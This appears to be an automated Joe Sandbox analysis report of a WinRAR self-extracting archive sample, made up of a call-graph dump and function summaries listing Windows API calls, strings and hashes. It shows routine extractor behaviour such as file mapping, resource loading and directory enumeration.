4851f 50 API calls 2 library calls 25516->25686 25517 49b41 25694 47951 78 API calls 25517->25694 25647 4bf0a 25519->25647 25520 49c8b 25521 49e85 25520->25521 25522 49ce7 25520->25522 25523 49e97 25521->25523 25524 49eab 25521->25524 25536 49d20 25521->25536 25525 49cff 25522->25525 25530 49da7 25522->25530 25701 4a475 138 API calls __EH_prolog 25523->25701 25651 54576 25524->25651 25526 49d46 25525->25526 25533 49d0e 25525->25533 25526->25536 25697 4829b 112 API calls 25526->25697 25529 49ec4 25661 5421f 25529->25661 25698 48f6b 38 API calls 25530->25698 25531 49c62 25531->25520 25695 4ac9c 83 API calls 25531->25695 25532->25520 25532->25531 25541 4aa7a 80 API calls 25532->25541 25696 4237a 75 API calls 25533->25696 25539 49e76 25536->25539 25549 49fca 25536->25549 25702 4237a 75 API calls 25536->25702 25539->25392 25541->25531 25542 49dec 25542->25536 25543 49e1f 25542->25543 25544 49e08 25542->25544 25700 4a212 104 API calls __EH_prolog 25543->25700 25699 48037 86 API calls 25544->25699 25548 4a0d5 25548->25550 25552 4b8e6 3 API calls 25548->25552 25549->25548 25549->25550 25551 4a083 25549->25551 25703 4b199 SetEndOfFile 25549->25703 25550->25500 25670 4b032 25551->25670 25553 4a130 25552->25553 25553->25550 25704 4237a 75 API calls 25553->25704 25556 4a0ca 25558 4a880 78 API calls 25556->25558 25558->25548 25559 4a140 25705 47871 77 API calls 25559->25705 25562 41653 25561->25562 25564 41665 Concurrency::cancel_current_task 25561->25564 25562->25564 25788 416b2 25562->25788 25565 42111 26 API calls 25564->25565 25566 41694 25565->25566 25791 4e339 25566->25791 25570 4b1e9 25569->25570 25571 4b1f3 25570->25571 25800 477af 79 API calls 25570->25800 25571->25380 25573->25397 25575 4c20d _abort 25574->25575 25580 4c0d3 25575->25580 25587 4c0b4 25580->25587 25582 4c148 25583 42111 25582->25583 25584 4211c 25583->25584 25585 4212b 25583->25585 25591 4136b 26 API calls Concurrency::cancel_current_task 25584->25591 25585->25415 25588 4c0c2 25587->25588 25589 4c0bd 25587->25589 25588->25582 25590 42111 26 API calls 25589->25590 25590->25588 25591->25585 25597 41822 25592->25597 25595->25425 25596->25429 25598 41834 25597->25598 25599 413f2 25597->25599 25600 4185d 25598->25600 25607 476e9 77 API calls __vswprintf_c_l 25598->25607 25599->25434 25602 6520e 22 API calls 25600->25602 25604 4187a 25602->25604 25603 41853 25608 4775a 76 API calls 25603->25608 25604->25599 25609 4775a 76 API calls 25604->25609 25607->25603 25608->25600 25609->25599 25611 41a8e 25610->25611 25613 41a8a 25610->25613 25614 419c5 143 API calls 25611->25614 25613->25439 25614->25613 25616 4e3a5 25615->25616 25618 4e3ac 25615->25618 25620 4aa7a 25616->25620 25618->25442 25619->25444 25621 4aa93 25620->25621 25623 4b110 80 API calls 25621->25623 25622 4aac5 25622->25618 25623->25622 25625 5efa8 25624->25625 25626 4f937 53 API calls 25625->25626 25627 5efcb 25626->25627 25628 44a20 _swprintf 51 API calls 25627->25628 25629 5efdd 25628->25629 25630 5e607 17 API calls 25629->25630 25631 52eba 25630->25631 25631->25392 25632->25457 25633->25457 25634->25455 25636 466ef 25635->25636 25708 465fb 25636->25708 25639 46722 25640 4675a 25639->25640 25713 4c6af CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25639->25713 25640->25473 25642 489dd 25641->25642 25643 48a15 25642->25643 25719 47931 75 API calls 25642->25719 25643->25480 25643->25482 25643->25486 25645 48a0d 25720 41397 75 API calls 25645->25720 25648 4bf18 25647->25648 25650 4bf22 25647->25650 25649 5feae 27 API calls 25648->25649 25649->25650 25650->25507 25652 54595 ___std_exception_copy 25651->25652 25653 5458b 25651->25653 25655 5461b 25652->25655 25656 546c5 25652->25656 25660 5463f _abort 25652->25660 25721 4775a 76 API calls 25653->25721 25722 544a9 76 API calls 3 library calls 25655->25722 25723 63330 RaiseException 25656->25723 25659 546f1 25660->25529 25662 54251 25661->25662 25663 54228 25661->25663 25664 54245 25662->25664 25738 566c4 138 API calls 2 library calls 25662->25738 25663->25664 25665 54247 25663->25665 25667 5423d 25663->25667 25664->25536 25737 5739e 133 API calls 25665->25737 25724 57dcc 25667->25724 25671 4b043 25670->25671 25674 4b052 25670->25674 25672 4b049 FlushFileBuffers 25671->25672 25671->25674 25672->25674 25673 4b0cf SetFileTime 25673->25556 25674->25673 25675->25464 25676->25476 25677->25471 25678->25478 25679->25508 25680->25508 25681->25508 25682->25508 25683->25508 25684->25516 25685->25516 25686->25489 25687->25498 25688->25494 25689->25498 25691 4ab25 GetFileType 25690->25691 25692 49b2b 25690->25692 25691->25692 25692->25519 25693 4237a 75 API calls 25692->25693 25693->25517 25694->25519 25695->25520 25696->25536 25697->25536 25698->25542 25699->25536 25700->25536 25701->25536 25702->25549 25703->25551 25704->25559 25705->25550 25706->25480 25707->25480 25714 464f8 25708->25714 25710 4661c 25710->25639 25712 464f8 2 API calls 25712->25710 25713->25639 25715 46502 25714->25715 25717 465ea 25715->25717 25718 4c6af CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25715->25718 25717->25710 25717->25712 25718->25715 25719->25645 25720->25643 25721->25652 25722->25660 25723->25659 25739 5479d 25724->25739 25726 57ddd __InternalCxxFrameHandler 25726->25726 25728 581ee 25726->25728 25745 4e56c 25726->25745 25754 55001 133 API calls 25726->25754 25755 58243 133 API calls 25726->25755 25756 5229f 89 API calls 25726->25756 25757 524df 25726->25757 25761 54b0c 99 API calls __InternalCxxFrameHandler 25726->25761 25762 5889f 138 API calls __InternalCxxFrameHandler 25726->25762 25763 563a9 99 API calls __InternalCxxFrameHandler 25728->25763 25730 581fe __InternalCxxFrameHandler 25730->25664 25737->25664 25738->25664 25741 547a7 _abort __EH_prolog 25739->25741 25740 54892 25740->25726 25741->25740 25742 60013 41 API calls 25741->25742 25743 54829 _abort ___std_exception_copy 25741->25743 25742->25743 25743->25740 25764 4775a 76 API calls 25743->25764 25751 4e582 __InternalCxxFrameHandler 25745->25751 25746 4e6f2 25748 4e726 25746->25748 25765 4e523 25746->25765 25769 52121 25748->25769 25751->25746 25752 4e6e9 25751->25752 25775 4bff5 92 API calls __EH_prolog 25751->25775 25776 59c9d 118 API calls 25751->25776 25752->25726 25754->25726 25755->25726 25756->25726 25758 52516 25757->25758 25759 524eb ResetEvent ReleaseSemaphore 25757->25759 25758->25726 25787 522fc 80 API calls 25759->25787 25761->25726 25762->25726 25763->25730 25764->25743 25766 4e568 25765->25766 25767 4e52b 25765->25767 25766->25748 25767->25766 25777 52e58 25767->25777 25770 52128 25769->25770 25772 52143 25770->25772 25785 476e4 RaiseException CallUnexpected 25770->25785 25771 52154 SetThreadExecutionState 25771->25752 25772->25771 25786 476e4 RaiseException CallUnexpected 25772->25786 25775->25751 25776->25751 25780 5eead 25777->25780 25781 515a3 25780->25781 25782 5eec4 SendDlgItemMessageW 25781->25782 25783 5c748 PeekMessageW KiUserCallbackDispatcher IsDialogMessageW TranslateMessage DispatchMessageW 25782->25783 25784 52e78 25783->25784 25784->25766 25785->25772 25786->25771 25787->25758 25797 420ed 26 API calls Concurrency::cancel_current_task 25788->25797 25790 416c0 25792 4e34a Concurrency::cancel_current_task 25791->25792 25798 4bd8e 87 API calls Concurrency::cancel_current_task 25792->25798 25794 4e37c 25799 4bd8e 87 API calls Concurrency::cancel_current_task 25794->25799 25796 4e387 25797->25790 25798->25794 25799->25796 25800->25571 25802 4baa1 25801->25802 25803 4bb20 FindNextFileW 25802->25803 25804 4baba FindFirstFileW 25802->25804 25805 4bb2b GetLastError 25803->25805 25811 4bb02 25803->25811 25806 4bac9 25804->25806 25804->25811 25805->25811 25807 4cf32 GetCurrentDirectoryW 25806->25807 25808 4bad9 25807->25808 25809 4baf7 GetLastError 25808->25809 25810 4badd FindFirstFileW 25808->25810 25809->25811 25810->25809 25810->25811 25811->25401 25812->25325 25814 53540 25813->25814 25816 53560 Concurrency::cancel_current_task 25814->25816 25817 52206 25814->25817 25818 524df 82 API calls 25817->25818 25819 52228 ReleaseSemaphore 25818->25819 25820 52266 DeleteCriticalSection CloseHandle CloseHandle 25819->25820 25821 52248 25819->25821 25820->25816 25824 522fc 80 API calls 25821->25824 25823 52252 CloseHandle 25823->25820 25823->25821 25824->25823 25825->25172 25826->25178 25827->25178 25828->25181 25829->25187 25831 4b1d2 79 API calls 25830->25831 25832 4208f 25831->25832 25833 41ad3 116 API calls 25832->25833 25836 420ac 25832->25836 25834 4209c 25833->25834 25834->25836 25837 41397 75 API calls 25834->25837 25836->25195 25836->25196 25837->25836 25839 5ffc0 25838->25839 25840 4b4e0 GetFileAttributesW 25839->25840 25841 4b4f1 25840->25841 25842 4b4ca 25840->25842 25843 4cf32 GetCurrentDirectoryW 25841->25843 25842->24977 25842->24991 25844 4b505 25843->25844 25844->25842 25845 4b509 GetFileAttributesW 25844->25845 25845->25842 25846->25215 25847->25216 25848->25218 25849->25229 26117 64bc0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25857 4acd4 25858 4acde 25857->25858 25859 4ae2c SetFilePointer 25858->25859 25860 4acf4 25858->25860 25862 4aa7a 80 API calls 25858->25862 25863 4ae05 25858->25863 25859->25860 25861 4ae49 GetLastError 25859->25861 25861->25860 25862->25863 25863->25859 26077 5bdd0 74 API calls 26118 673d0 QueryPerformanceFrequency QueryPerformanceCounter 26078 5ede1 DialogBoxParamW 25874 6cce0 25875 6ccf2 25874->25875 25876 6cce9 25874->25876 25878 6cbd7 25876->25878 25879 6a505 _abort 38 API calls 25878->25879 25880 6cbe4 25879->25880 25898 6ccfe 25880->25898 25882 6cbec 25907 6c96b 25882->25907 25885 6cc03 25885->25875 25886 6a7ee __vsnwprintf_l 21 API calls 25887 6cc14 25886->25887 25888 6cc46 25887->25888 25914 6cda0 25887->25914 25891 6a65a _free 20 API calls 25888->25891 25891->25885 25892 6cc41 25924 6a7db 20 API calls __dosmaperr 25892->25924 25894 6cc8a 25894->25888 25925 6c841 26 API calls 25894->25925 25895 6cc5e 25895->25894 25896 6a65a _free 20 API calls 25895->25896 25896->25894 25899 6cd0a ___scrt_is_nonwritable_in_current_image 25898->25899 25900 6a505 _abort 38 API calls 25899->25900 25905 6cd14 25900->25905 25902 6cd98 _abort 25902->25882 25905->25902 25906 6a65a _free 20 API calls 25905->25906 25926 6a0e4 38 API calls _abort 25905->25926 25927 6bde1 EnterCriticalSection 25905->25927 25928 6cd8f LeaveCriticalSection _abort 25905->25928 25906->25905 25908 65934 __fassign 38 API calls 25907->25908 25909 6c97d 25908->25909 25910 6c99e 25909->25910 25911 6c98c GetOEMCP 25909->25911 25912 6c9a3 GetACP 25910->25912 25913 6c9b5 25910->25913 25911->25913 25912->25913 25913->25885 25913->25886 25915 6c96b 40 API calls 25914->25915 25916 6cdbf 25915->25916 25918 6ce35 _abort 25916->25918 25920 6ce10 IsValidCodePage 25916->25920 25922 6cdc6 25916->25922 25917 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25919 6cc39 25917->25919 25929 6ca43 GetCPInfo 25918->25929 25919->25892 25919->25895 25921 6ce22 GetCPInfo 25920->25921 25920->25922 25921->25918 25921->25922 25922->25917 25924->25888 25925->25888 25927->25905 25928->25905 25930 6cb27 25929->25930 25935 6ca7d 25929->25935 25932 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25930->25932 25934 6cbd3 25932->25934 25934->25922 25939 6db38 25935->25939 25938 6bd28 __vsnwprintf_l 43 API calls 25938->25930 25940 65934 __fassign 38 API calls 25939->25940 25941 6db58 MultiByteToWideChar 25940->25941 25943 6db96 25941->25943 25951 6dc2e 25941->25951 25946 6a7ee __vsnwprintf_l 21 API calls 25943->25946 25949 6dbb7 _abort __vsnwprintf_l 25943->25949 25944 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25947 6cade 25944->25947 25945 6dc28 25958 6bd73 20 API calls _free 25945->25958 25946->25949 25953 6bd28 25947->25953 25949->25945 25950 6dbfc MultiByteToWideChar 25949->25950 25950->25945 25952 6dc18 GetStringTypeW 25950->25952 25951->25944 25952->25945 25954 65934 __fassign 38 API calls 25953->25954 25955 6bd3b 25954->25955 25959 6bb0b 25955->25959 25958->25951 25960 6bb26 __vsnwprintf_l 25959->25960 25961 6bb4c MultiByteToWideChar 25960->25961 25962 6bb76 25961->25962 25963 6bd00 25961->25963 25966 6a7ee __vsnwprintf_l 21 API calls 25962->25966 25968 6bb97 __vsnwprintf_l 25962->25968 25964 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25963->25964 25965 6bd13 25964->25965 25965->25938 25966->25968 25967 6bbe0 MultiByteToWideChar 25969 6bbf9 25967->25969 25982 6bc4c 25967->25982 25968->25967 25968->25982 25986 6c11c 25969->25986 25973 6bc23 25977 6c11c __vsnwprintf_l 11 API calls 25973->25977 25973->25982 25974 6bc5b 25975 6a7ee __vsnwprintf_l 21 API calls 25974->25975 25980 6bc7c __vsnwprintf_l 25974->25980 25975->25980 25976 6bcf1 25994 6bd73 20 API calls _free 25976->25994 25977->25982 25978 6c11c __vsnwprintf_l 11 API calls 25981 6bcd0 25978->25981 25980->25976 25980->25978 25981->25976 25983 6bcdf WideCharToMultiByte 25981->25983 25995 6bd73 20 API calls _free 25982->25995 25983->25976 25984 6bd1f 25983->25984 25996 6bd73 20 API calls _free 25984->25996 25987 6be48 _abort 5 API calls 25986->25987 25988 6c143 25987->25988 25991 6c14c 25988->25991 25997 6c1a4 10 API calls 3 library calls 25988->25997 25990 6c18c LCMapStringW 25990->25991 25992 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25991->25992 25993 6bc10 25992->25993 25993->25973 25993->25974 25993->25982 25994->25982 25995->25963 25996->25982 25997->25990 26052 610e0 LocalFree 26079 6d1e0 GetProcessHeap 26095 5c2e3 79 API calls 26080 605f0 27 API calls 26012 5eff2 26013 5efff 26012->26013 26014 4f937 53 API calls 26013->26014 26015 5f00c 26014->26015 26016 44a20 _swprintf 51 API calls 26015->26016 26017 5f021 SetDlgItemTextW 26016->26017 26018 5c748 5 API calls 26017->26018 26019 5f03e 26018->26019 26054 730f0 CloseHandle 26022 413fd 43 API calls 2 library calls 26097 52efb GetCPInfo IsDBCSLeadByte

    Executed Functions

    Function 0005F04C Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 202filesleeptimeCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
      • Part of subcall function 00051B7C: GetModuleHandleW.KERNEL32(kernel32), ref: 00051B95
      • Part of subcall function 00051B7C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00051BA7
      • Part of subcall function 00051B7C: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00051BD8
      • Part of subcall function 0005B64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0005B655
      • Part of subcall function 0005BD0B: OleInitialize.OLE32(00000000), ref: 0005BD24
      • Part of subcall function 0005BD0B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0005BD5B
      • Part of subcall function 0005BD0B: SHGetMalloc.SHELL32(0008A460), ref: 0005BD65
    • GetCommandLineW.KERNEL32 ref: 0005F08B
    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0005F0B5
    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 0005F0C6
    • UnmapViewOfFile.KERNEL32(00000000), ref: 0005F117
      • Part of subcall function 0005ED1E: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0005ED34
      • Part of subcall function 0005ED1E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0005ED70
      • Part of subcall function 0005074B: _wcslen.LIBCMT ref: 0005076F
    • CloseHandle.KERNEL32(00000000), ref: 0005F11E
    • GetModuleFileNameW.KERNEL32(00000000,000A0CC0,00000800), ref: 0005F138
    • SetEnvironmentVariableW.KERNEL32(sfxname,000A0CC0), ref: 0005F144
    • GetLocalTime.KERNEL32(?), ref: 0005F14F
    • _swprintf.LIBCMT ref: 0005F18E
    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0005F1A3
    • GetModuleHandleW.KERNEL32(00000000), ref: 0005F1AA
    • LoadIconW.USER32(00000000,00000064), ref: 0005F1C1
    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9C0,00000000), ref: 0005F212
    • Sleep.KERNEL32(?), ref: 0005F240
    • DeleteObject.GDI32 ref: 0005F279
    • DeleteObject.GDI32(?), ref: 0005F289
    • CloseHandle.KERNEL32 ref: 0005F2CC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
    • API String ID: 3014515783-3710569615
    • Opcode ID: 6a9c4460e9dede79e4ebdec28465f4a4d83083bb0d6e71f99e73f5b7dff45130
    • Instruction ID: f49b7e8014b3e5aad60dfee0f943f32f3a4064583b29592813cd5f31325bff26
    • Opcode Fuzzy Hash: 6a9c4460e9dede79e4ebdec28465f4a4d83083bb0d6e71f99e73f5b7dff45130
    • Instruction Fuzzy Hash: 9E61F671900701ABF710AB61EC49FBB7BECFB46746F04012AFA4592192DB7C9D48CB62
    Function 0005B6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 701 5b6c2-5b6df FindResourceW 702 5b6e5-5b6f6 SizeofResource 701->702 703 5b7db 701->703 702->703 704 5b6fc-5b70b LoadResource 702->704 705 5b7dd-5b7e1 703->705 704->703 706 5b711-5b71c LockResource 704->706 706->703 707 5b722-5b737 GlobalAlloc 706->707 708 5b7d3-5b7d9 707->708 709 5b73d-5b746 GlobalLock 707->709 708->705 710 5b7cc-5b7cd GlobalFree 709->710 711 5b74c-5b76a call 62db0 CreateStreamOnHGlobal 709->711 710->708 714 5b7c5-5b7c6 GlobalUnlock 711->714 715 5b76c-5b78e call 5b626 711->715 714->710 715->714 720 5b790-5b798 715->720 721 5b7b3-5b7c1 720->721 722 5b79a-5b7ae GdipCreateHBITMAPFromBitmap 720->722 721->714 722->721 723 5b7b0 722->723 723->721
    APIs
    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0005C91D,00000066), ref: 0005B6D5
    • SizeofResource.KERNEL32(00000000,?,?,?,0005C91D,00000066), ref: 0005B6EC
    • LoadResource.KERNEL32(00000000,?,?,?,0005C91D,00000066), ref: 0005B703
    • LockResource.KERNEL32(00000000,?,?,?,0005C91D,00000066), ref: 0005B712
    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0005C91D,00000066), ref: 0005B72D
    • GlobalLock.KERNEL32(00000000), ref: 0005B73E
    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0005B762
    • GlobalUnlock.KERNEL32(00000000), ref: 0005B7C6
      • Part of subcall function 0005B626: GdipAlloc.GDIPLUS(00000010), ref: 0005B62C
    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0005B7A7
    • GlobalFree.KERNEL32(00000000), ref: 0005B7CD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
    • String ID: PNG
    • API String ID: 211097158-364855578
    • Opcode ID: 3b0e13a5933ed60b23433a8bfd360cda6c00ddc24d3c657b41b870af5db797b2
    • Instruction ID: 2981f56844230afc6e70c68f98afbd1d5618c90b41cccf3ea33378dc70228679
    • Opcode Fuzzy Hash: 3b0e13a5933ed60b23433a8bfd360cda6c00ddc24d3c657b41b870af5db797b2
    • Instruction Fuzzy Hash: 8F317271604706AFE7119F21EC49D2B7FA8FF88792B050518FD09D2261EB39EC94CBA0
    Function 0004BA94 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 835 4ba94-4bab8 call 5ffc0 838 4bb20-4bb29 FindNextFileW 835->838 839 4baba-4bac7 FindFirstFileW 835->839 840 4bb3b-4bbf8 call 51928 call 4d71d call 52914 * 3 838->840 841 4bb2b-4bb39 GetLastError 838->841 839->840 842 4bac9-4badb call 4cf32 839->842 846 4bbfd-4bc0a 840->846 843 4bb12-4bb1b 841->843 850 4baf7-4bb00 GetLastError 842->850 851 4badd-4baf5 FindFirstFileW 842->851 843->846 853 4bb10 850->853 854 4bb02-4bb05 850->854 851->840 851->850 853->843 854->853 856 4bb07-4bb0a 854->856 856->853 858 4bb0c-4bb0e 856->858 858->843
    APIs
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BABD
      • Part of subcall function 0004CF32: _wcslen.LIBCMT ref: 0004CF56
    • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BAEB
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BAF7
    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BB21
    • GetLastError.KERNEL32(?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BB2D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FileFind$ErrorFirstLast$Next_wcslen
    • String ID:
    • API String ID: 42610566-0
    • Opcode ID: 72c754d398826fd2467236491f1ef1ec75e82bbb9fcb61c7e896f2e9e7648d50
    • Instruction ID: feee32e3e1cfef516e0b1a30b6f67f439eeeb35c19bcb7e693c04485da6b7b33
    • Opcode Fuzzy Hash: 72c754d398826fd2467236491f1ef1ec75e82bbb9fcb61c7e896f2e9e7648d50
    • Instruction Fuzzy Hash: 584162B2900519ABCB25DF64CC94AEEB3B8FF48350F1041A6E96DE3201D774AE94CF94
    Function 0005B0BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77comCOMMON
    Download Yara Rule
    APIs
    • CLSIDFromString.COMBASE(?,?), ref: 0005B0CF
    • CoCreateInstance.COMBASE(?,00000000,00000005,000764FC,?), ref: 0005B0E6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CreateFromInstanceString
    • String ID: Pzv
    • API String ID: 432265043-4092170144
    • Opcode ID: bd56a3104036981c1ce6a98cee8fc6eee5250e1a33de4f7308af46af4826bf1e
    • Instruction ID: 46a0ac9e808f840d09caeff70e74360f638fc1f2d07f6a477b47271a23058c56
    • Opcode Fuzzy Hash: bd56a3104036981c1ce6a98cee8fc6eee5250e1a33de4f7308af46af4826bf1e
    • Instruction Fuzzy Hash: 30213C75A00514EFEB44DF68CC58D5E7BB8EF48705B000059FA06E7261CB79AD42CF90
    Function 000492C6 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1157COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000492CB
      • Part of subcall function 0004D656: _wcsrchr.LIBVCRUNTIME ref: 0004D660
      • Part of subcall function 0004CAA0: _wcslen.LIBCMT ref: 0004CAA6
      • Part of subcall function 00051900: _wcslen.LIBCMT ref: 00051906
      • Part of subcall function 0004B5D6: _wcslen.LIBCMT ref: 0004B5E2
      • Part of subcall function 0004B5D6: __aulldiv.LIBCMT ref: 0004B60E
      • Part of subcall function 0004B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0004B615
      • Part of subcall function 0004B5D6: _swprintf.LIBCMT ref: 0004B640
      • Part of subcall function 0004B5D6: _wcslen.LIBCMT ref: 0004B64A
      • Part of subcall function 0004B5D6: _swprintf.LIBCMT ref: 0004B6A0
      • Part of subcall function 0004B5D6: _wcslen.LIBCMT ref: 0004B6AA
      • Part of subcall function 00044727: __EH_prolog.LIBCMT ref: 0004472C
      • Part of subcall function 0004A212: __EH_prolog.LIBCMT ref: 0004A217
      • Part of subcall function 0004B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B8FA
      • Part of subcall function 0004B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B92B
    Strings
    • __tmp_reference_source_, xrefs: 00049596
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
    • String ID: __tmp_reference_source_
    • API String ID: 70197177-685763994
